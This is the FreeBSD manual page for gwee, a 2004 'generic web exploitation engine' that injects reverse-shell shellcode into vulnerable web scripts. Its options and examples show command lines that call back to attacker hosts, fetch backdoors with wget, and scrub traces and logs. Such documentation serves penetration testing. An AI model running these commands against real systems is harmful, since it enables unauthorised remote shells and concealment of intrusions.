Skip site navigation (1)Skip section navigation (2)

FreeBSD Manual Pages

  
 
  

home | help
gwee(1)				Security tools			       gwee(1)

NAME
       gwee - generic web exploitation engine
       Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
       Perl and	Python shellcode and expertise by Sabu <sabu@sentinix.org>

SYNOPSIS
       gwee -h|-V
       gwee options url

DESCRIPTION
       gwee  (generic web exploitation engine) is a small program written in C
       designed	to exploit arbitrary command execution vulnerabilities in  web
       scripts,	such as	Perl CGIs, PHP,	etc. gwee is much like an exploit, ex-
       cept more general-purpose. It  features	several	 reverse  (connecting)
       shellcodes (x86 Linux, FreeBSD, NetBSD, Perl script (universal),	Python
       script (universal)), several methods  of	 injecting  (executing)	 them,
       built-in	http/https client and built-in server (listener) for receiving
       connections (and	remote shell) from injected shellcodes.	gwee  is  dis-
       tributed	 under	the  MIT  License. The Perl and	Python shellcodes were
       written by Sabu <sabu@sentinix.org>.

OPTIONS
       -h     Display help (you	can execute gwee without arguments too).

       -y string
	      The parameter to insert before the shellcode  injection  command
	      line  is	inserted. The shellcode	is inserted between the	values
	      of the -y	option and the -z option. In  POST  requests  (default
	      behaviour),  the -y and -z options go into the POST data,	not in
	      the URL. In GET and HEAD requests, the "-y <shellcode>  -z"  op-
	      tion  combination	 is  appended to the URL. If you need to add a
	      '?' you can do that either in the	URL or as the  first  char  of
	      the -y option.  By default, -y and -z are	empty.

       -z string
	      String  to  append after the shellcode injection command.	By de-
	      fault, the -z string is empty. An	example	usage of the -y	-z op-
	      tion combo would be:

	      $	gwee -H	-y '?testvar=' -z '|' target/cgi-bin/test.cgi

	      This will	resolve	into:
	      http://target/cgi-bin/test.cgi?testvar=perl -e "print <shellcode>"|
	      Of course, you could have	done it	this way too, same result:
	      $	gwee -z	'|' 'target/cgi-bin/test.cgi?testvar='

	      $	gwee -y	testvar= -z '|'	target/cgi-bin/test.cgi

	      This will	resolve	into:
	      http://target/cgi-bin/test.cgi
	      POST data: testvar=perl -e "print	<shellcode>"|

       -G     Use  HTTP	 GET  instead  of  POST. This is not recommended since
	      nasty long tell-tail strings will	end up in the  access_log.  In
	      order for	the whole payload to fit into a	1024 byte GET request,
	      the shellcode is split up	into 4 separate	requests, all  produc-
	      ing  nasty  logs.	  -H  Use  HTTP	HEAD instead of	POST/GET. Read
	      about -G,	the same nasty logs will appear	on the target and  the
	      shellcode	will be	split into 4 requests.

       -l your_ip_or_hostname
	      The  IP or hostname to have the shellcode	connect	back to. Host-
	      names will be resolved into IP numbers, since  that's  the  only
	      method used by the binary	shellcodes.

       -p port
	      The port to connect back to, default is 31337.

       -s #   Choose which shellcode to	install	on the target:

	      0	= Sabu's Perl shellcode	(default if -s is omitted)
	      1	= Linux	x86 binary
	      2	= FreeBSD x86 binary
	      3	= NetBSD x86 binary
	      4	= Sabu's Python	shellcode (the target must have	Python installed)

       -i #   Choose shellcode injection method:

	      0	= perl -e "print
	      1	= python -c "__import__(
	      2	= printf "<hex>"
	      3	= echo -ne "<hex>" (works only if target's /bin/sh is bash)

       -I prefix_path
	      Choose a prefix to the shellcode injection method, e.g.:
	      -i1 -I /usr/local/bin/
	      that  would  parse it into: /usr/local/bin/python	-c...  default
	      is empty (the preferred way).

       -T /var/tmp/.vetx.95
	      Choose a different temporary filename for	the shellcode/backdoor
	      on the target than the default.

       -a user agent string
	      Choose user agent	string,	e.g.:
		 -a "Mozilla/4.0 (compatible; MSIE 6.0;	Windows	NT 5.0)"
	      If  -a  is  omitted, gwee	will randomize from 25 real user-agent
	      strings.

       -v     Be really	verbose, disclose exactly which	commands are being ex-
	      ecuted.

       -q     Be really	silent,	only output error messages, nothing else.

       -L     Run built-in tcp listener	(no need to use	"nc -l").

       -A     Only  listen  for	 incoming connection on	-p port, nothing else.
	      This is just like: nc -l -p port -w timeout

       -t seconds
	      Time-out in seconds until	listener (-L) times  out.  Default  is
	      -t30 (30 seconds), -t0 means no time-out.

       -f     Simply  non-interactive,	you don't need to press	return to pro-
	      ceed.

       -w http://home.of.attacker/reverse_shellcode
	      If you specify the -w option, the	 injection  methods  won't  be
	      used.  Instead "wget -Yoff -q -O <bd> <url>" will	be executed on
	      the target to download a reverse	shellcode/backdoor  that  will
	      consequently  be execute as per usual. Use the -d	option to dump
	      a	shellcode that you can upload somewhere.

       -d outfile
	      This option will dump shellcode instead of  injecting  it	 some-
	      where. You use the -l -p and -s options as usual,	but instead of
	      connecting somewhere, the	generated shellcode will be dumped  to
	      a	file you specify after the -d. Upload this file	to a webserver
	      and use it's URL with the	-w option. For example,	 this  command
	      will dump	x86 Linux sishell:
	      $	gwee -lyourhostname. -p1337 -s1	-d bd
	      $	scp bd leet@host:/wwwroot/
	      $	gwee -w	http://host/bd -LG -p1337 'target/cgi-bin/vuln.cgi?'

       -P     Preserve	the  shellcode	after injection. Normally, the exploit
	      will send	a HTTP POST, HEAD or GET request trying	to execute "rm
	      -f  /var/tmp/.vetx.95" This will leave nasty logs	even after you
	      wipe yourself from the logs. If you know you'll get a shell on a
	      box,  use	 the -P	option with the	-L option. Once	connected with
	      -L, it'll	automatically send a "shred -fu	; rm -f" over the con-
	      nected socket.

       -r     Remove  created backdoor file (shellcode)	on the target. This is
	      done automatically, but you still	have the choice	to  explicitly
	      do a remove.

EXAMPLES
       gwee -y 'q=%3B' -l fubar.org. -p	6666 -L	https://target/cgi-bin/vuln.cgi
       gwee -y'?cmd=' -z'|' -G -l mydom.tld -p 9000 -s1	-i3 -Lf	target/vuln.pl
       gwee -y'loginname=%3B' -l mydom.tld -p80	-Lf https://target/userstat.pl
       gwee -A -p 6666 -t0 -q

LICENSE
       gwee - generic web exploitation engine
       Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
       Perl and	Python shellcode and expertise by Sabu <sabu@sentinix.org>

       Permission is hereby granted, free of charge, to	any person obtaining a
       copy of this software and associated documentation  files  (the	"Soft-
       ware"),	to deal	in the Software	without	restriction, including without
       limitation the rights to	use, copy, modify, merge, publish, distribute,
       sublicense,  and/or  sell copies	of the Software, and to	permit persons
       to whom the Software is furnished to do so, subject  to	the  following
       conditions:

       The above copyright notice and this permission notice shall be included
       in all copies or	substantial portions of	the Software.

       THE SOFTWARE IS PROVIDED	"AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
       OR  IMPLIED,  INCLUDING	BUT  NOT  LIMITED  TO  THE  WARRANTIES OF MER-
       CHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN
       NO  EVENT  SHALL	 THE  AUTHORS  OR  COPYRIGHT HOLDERS BE	LIABLE FOR ANY
       CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN	 ACTION	 OF  CONTRACT,
       TORT OR OTHERWISE, ARISING FROM,	OUT OF OR IN CONNECTION	WITH THE SOFT-
       WARE OR THE USE OR OTHER	DEALINGS IN THE	SOFTWARE.

AUTHOR
       My name is Michel Blomgren. I'm an information security consultant spe-
       cializing in risk/vulnerability assessment and penetration testing with
       Cycom AB, www.cycom.se. I'm the developer of SENTINIX, a	GNU/Linux dis-
       tribution  designed  for	 monitoring,  intrusion	 detection, anti-spam,
       anti-virus and clustering. You may contact me by	sending	an  e-mail  to
       <michel@cycom.se>.  If you like to keep the conversation	private, fetch
       my  PGP public key on  http://www.cycom.se/misc/pubkeymichel.asc	 (886A
       7B17 1747 6C82 7A7E EAC0	A3F1 2943 101C 18FA).

SEE ALSO
       rrs(1)

gwee				   May 2004			       gwee(1)

NAME | SYNOPSIS | DESCRIPTION | OPTIONS | EXAMPLES | LICENSE | AUTHOR | SEE ALSO

Want to link to this manual page? Use this URL:
<https://www.freebsd.org/cgi/man.cgi?query=gwee&sektion=1&manpath=FreeBSD+12.1-RELEASE+and+Ports>

home | help